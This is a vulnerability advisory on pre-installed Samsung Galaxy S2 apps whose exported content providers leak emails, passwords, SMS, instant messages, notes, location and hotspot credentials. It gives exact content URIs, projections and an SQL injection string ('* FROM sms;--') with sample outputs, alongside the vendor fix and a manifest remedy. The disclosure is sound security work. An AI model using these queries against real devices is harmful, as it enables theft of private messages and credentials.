Multiple Samsung (Android) Application Vulnerabilities

Many Samsung applications are pre-installed by default on Samsung Android devices and these applications cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default. This results in these content providers allowing other applications on the device to request sensitive information and successfully obtain it. This is cause for concern as any 3rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. It should be noted that only applications disclosing potentially sensitive information are being reported on in this document.

Package Name
Multiple pre-installed Samsung applications
Date
2011-12-13
Affected Versions
Samsung Galaxy S2 (I9100XWKI4) – Android 2.3.4
Other models running these applications may be affected
CVE Reference
None
Authors
Tyrone Erasmus
Mike Auty (Channels SQLi)
Severity
High Risk
Local/Remote
Local
Vulnerability Class
Android Content Providers
Vendor
Samsung
Vendor Response
Vendor updated all vulnerable software and firmware releases after 13th March 2012 contain the fixes.

Description

The following applications allow the retrieval of sensitive information from their content providers without any granted permissions:

Package Obtainable Information Version
com.seven.z7
(Social Hub)
Email address and password
Email contents
Instant messages
7.52.10101
com.sec.android.socialhub
(Social Hub)
Social networking messages 2.00.00001
com.sec.android.im (IM) Instant messages 1.00.10201
com.android.providers.telephony (Dialer Storage) SMS 2.3.4
com.sec.android.provider.logsprovider (LogsProvider) SMS
Email contents
Instant messages
Social networking messages
1.0
com.sec.android.widgetapp.weatherclock
(AccuWeather.com)
Location 11.06.27.01
com.sec.android.app.minidiary Notes
(MiniDiary)
Photos
Photo locations
1.0
com.sec.android.app.memo
(Memo)
Notes 1.0
com.sec.android.widgetapp.postit
(Minipaper)
Notes 1.0
com.osp.app.signin
(Samsung Account)
Encrypted account information 1.0

Impact

Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker.

Cause

These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application’s AndroidManifest.xml file.

Interim Workaround

Avoid using the vulnerable applications if you do not have access to the firmware update. To clear informationstored in these applications go to Settings→Applications→Manage Applications and press “Clear data”.

clear-data

Solution

In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. An example is shown below:

<provider android:name=".db.Provider” android:authorities="com.example.app" 
  android:readPermission="com.example.app.provider.permission.READ" 
  android:writePermission="com.example.app.provider.permission.WRITE" />

This means that an application wanting to read or write to this content provider needs to have the stated
permissions in order to do so.

Technical Description

The following section will be organised by the information that is obtainable by an unprivileged application. Thepremise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information.

When querying a content provider, methods are provided that allows the developer to construct SQL statements. The following is what the query method in Android looks like to a developer:

query(uri, projection, selection, selectionArgs, sortOrder)

These parameters get used at various points in a SQL statement to construct the query. This also means that there is often SQL injection vulnerabilities present in these fields on content providers.

Email

com.seven.z7 (Social Hub)

Registered user accounts within Social Hub and their associated service.

Uri: content://com.seven.provider.email/accounts
Projection: user_name, provision_name
Response:
user_name | provision_name
testaccount@yahoo.com | Yahoo! Messenger
testaccount@yahoo.com | Yahoo! Mail
com.seven.z7 (Social Hub)

The password for instant messaging accounts within Social Hub. This password is often the same for the email account and IM account on services like Yahoo and Google.

Uri: content://com.seven.provider.email/dbprefs
Response:
_id | category | type | key | value | flags
...
242 | Account-6 | 5 | Z7_IM_CLIENT_SETTING_PASSWORD_STRING | Password123 | 0
...
com.seven.z7 (Social Hub)

Email messages.

Uri: content://com.seven.provider.email/emails
Projection: _id, _from, subject, body
Response:
_id | _from | subject | body
...
30 | friend@yahoo.com | Test subject | Email contents
...
com.sec.android.provider.logsprovider (LogsProvider)

Email messages.

Uri: content://logs/email_seven
Projection: messageid, address, m_subject, m_content
Response:
messageid | address | m_subject | m_content
...
30 | friend@yahoo.com | Test subject | Email contents
...

All email accounts registered in Social Hub have their email contents logged. This query to the logs content provider shows the same data as com.seven.provider.email provider except that even if the account gets deregistered or removed from Social Hub, the logs still persist.

Instant Messages

com.seven.z7 (Social Hub)

Get all contacts.

Uri: content://com.seven.provider.im/contacts
Projection: contact
Response:
John
Paul
Susan
com.seven.z7 (Social Hub)

Get instant messages from Social Hub.

Uri: content://com.seven.provider.im/messages
Projection: _id, contact, account, body
Response:
_id | contact | account | body
...
14 | John | 6 | Hi, how are you?
...
com.sec.android.provider.logsprovider (LogsProvider)

Get the same instant message as above, except from the logs.

Uri: content://logs/im
Projection: account_id, name, m_content
Response:
account_id | buddy_name | message
...
6 | John | Hi, how are you?
...

The logs persist even after an IM account has been deregistered.

com.sec.android.im (IM)

Get the same instant message as above, except from the IM application itself.

Uri: content://com.tecace.app.convprovider
Projection: _id, accountId, buddy_name, message
Response:
_id | accountId | buddy_name | message
...
3 | -1 | null | Hi, how are you?
...

SMS

com.android.providers.telephony (Dialer Storage)

All SMS messages.

Uri: content://channels
Projection: * FROM sms;--
Response:
_id | thread_id | address | person | date | protocol | read | status | type | 
reply_path_present | subject | body | service_center | locked | error_code | seen | 
deletable | hidden | group_id | group_type | delivery_date
...
572 | 3 | +27821234567 | null | 1323444871859 | null | 1 | 0 | 2 | null | null | This 
is a message from me to you | null | 0 | 0 | 1 | 1 | 0 | null | null | 1323444881072
...

SQL injection exists within the projection and selection parameters for the channels content provider.

com.sec.android.provider.logsprovider (LogsProvider)

First 50 characters of SMS messages.

Uri: content://logs/historys
Projection: number, m_content
Selection: number like '+%'
Response:
number | m_content
...
+27821234567 | This is a message from me to you
...

Social Networking Messages

com.sec.android.socialhub (Social Hub)

Messages from Social Networks.

Uri: content://com.sec.android.socialhub.unifiedinbox/messages
Projection: name,m_subject,m_content
Response:
name | m_subject | m_content
John Smith | Birthday | Are you coming to my party?

Notes

com.sec.android.app.minidiary (MiniDiary)

All notes entries, photos and photo locations.

Uri: content://com.sec.android.providers.minidiary.MiniDiaryData/diary
Projection: _id, location, date, longitude, latitude, picture_file, note
Response:
_id | location | date | longitude | latitude | picture_file | note
1 | Germany, Hesse | 2011.01.11 | 9804903 | 51115599 | /data/data/com.sec.android.app.minidiary/files/picture/1323636867660.jpg | Beautiful!

It should also be noted that on Android the contents of the SD card are accessible from any application, allowing applications to retrieve them and upload them to an attacker.

com.sec.android.app.memo (Memo)

User notes stored in this application.

Uri: content://com.samsung.sec.android/memo/all
Projection: _id, title, content
Response:
_id | title | content
1 | 20111211 | Note contentsPUBLIC
com.sec.android.widgetapp.postit (Minipaper)

User notes stored in this application.

Uri: content://com.sec.android.widgetapp.postit/postit
Projection: _id, body
Response:
_id | body
1 | My first postit!

Miscellaneous

com.sec.android.socialhub (Social Hub)

Name of the owner of the device.

Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map
Projection: receiver_name
Response:
Tyrone Erasmus
com.sec.android.widgetapp.weatherclock (AccuWeather.com)

General location of the owner of the device.

Uri: content://com.sec.android.widgetapp.weatherclock
Response:
NAME | STATE | LOCATION | MAIN_DISPLAY | SUMMER_TIME | LATITUDE | LONGITUDE | PROVIDER
Pretoria | Gauteng, South Africa | cityId:305449 | 1 | 0 | -25.7315 | 28.21821 | 0PUBLIC
com.osp.app.signin (Samsung account)

Obtain encrypted Samsung account settings.

Uri: content://com.osp.contentprovider.ospcontentprovider/identity
Response:
Value | Key
<base64_value> | UserID
<base64_value> | EmailID
<base64_value> | Password
<base64_value> | MobileCountryCode 
<base64_value> | AuthToken
<base64_value> | AuthTokenSecret
<base64_value> | BirthDate
<base64_value> | UserDeviceID

It should be noted that the given above is an encrypted string that has been base64 encoded.

If the mechanism that encrypts and decrypts this data is found to be weak, the user’s Samsung account would be compromised.

com.android.providers.settings (Settings Storage)

Portable Wi-Fi hotspot credentials.

Uri: content://settings/secure
Response:
_id | name | value
2736 | wifi_ap_passwd | h0tsp0tp@ssw0rd
...
2859 | wifi_ap_ssid | Hotspot1234